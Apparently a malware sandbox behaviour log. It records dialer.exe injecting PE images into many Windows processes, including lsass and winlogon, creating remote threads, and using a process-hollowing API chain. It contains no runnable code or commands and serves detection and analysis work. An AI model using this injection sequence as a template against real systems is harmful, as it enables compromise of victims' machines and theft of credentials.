                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B5644B0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2108B950000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29166960000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19E29D00000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 3160000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64500000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CB55570000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D8C0730000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 240D6250000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 227F2E70000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1E71EBB0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23E7F4D0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 268D2E90000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1A220F70000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 112C58A0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\Desktop\GR55Qg1hth.exe base: 1B630F60000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B240000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\Desktop\F4R5fd8grr.exe base: 2730000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E9A6600000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21CEA710000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1C25C740000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sc.exe base: 17CD5980000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 20FE3BB0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe base: 23E07EF0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2E72A0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1A645CD0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 12762130000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 29BB2510000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25AB6AE0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 19216AB0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B3680000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B36E0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 270D5B50000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 20717890000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\schtasks.exe base: 162620F0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0200000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0230000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 24C84EC0000 protect: page execute and read and write
                    Source: C:\Windows\System32\dialer.exeCode function: 51_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,51_2_0000000140001C88
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0AB273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 612D273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEDA273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8799273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5377273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D53273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 67D273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5B38273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EBFD273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5904273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9E7273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7316273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4E86273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 473C273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6F9D273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 83BC273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D3F7273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A415273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BDF3273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C026273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9F3273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 644B273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B2A273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4F6273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2AB4273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ADB273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25DA273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F535273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F0D6273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FFB273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C257273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B95273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6696273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13EF273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D57273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 69B4273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC74273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5DA7273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199D273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F389273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B8273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E4273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A653273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 29D0273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B15273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F48273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B4B273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 316273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E26273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D593273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC69273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7897273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B4273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D0A273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A64273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF3273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6450273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4935273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60DA273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E815273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5234273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA9273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5557273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C073273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D625273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F2E7273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1EBB273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7F4D273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D2E9273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 20F7273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C58A273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 30F6273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1B24273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A660273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EA71273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5C74273C
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\sc.exe EIP: D598273C
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\conhost.exe EIP: E3BB273C
                    Source: C:\Windows\System32\dialer.exeThread created: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe EIP: 7EF273C
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EIP: E72A273C
                    Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\conhost.exe EIP: 45CD273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6213273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B251273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B6AE273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 16AB273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B368273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B36E273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D5B5273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1789273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 620F273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F020273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F023273C
                    Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 84EC273C
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeNtResumeThread: Indirect: 0x276231E
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeNtEnumerateValueKey: Indirect: 0x276293D
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeNtWriteVirtualMemory: Direct from: 0x7FF650224A81Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeNtQuerySystemInformation: Indirect: 0x1B88205DJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeNtDeviceIoControlFile: Indirect: 0x2762B9D
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeNtEnumerateValueKey: Indirect: 0x276290E
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeNtQuerySystemInformation: Indirect: 0x1B882F57Jump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeNtEnumerateKey: Indirect: 0x2762842
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeNtEnumerateKey: Indirect: 0x2762875
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeNtEnumerateValueKey: Indirect: 0x1B88293DJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeNtQuerySystemInformation: Indirect: 0x276205D
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeNtEnumerateValueKey: Indirect: 0x1B88290EJump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDA0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B950000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166960000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29D00000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 3160000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
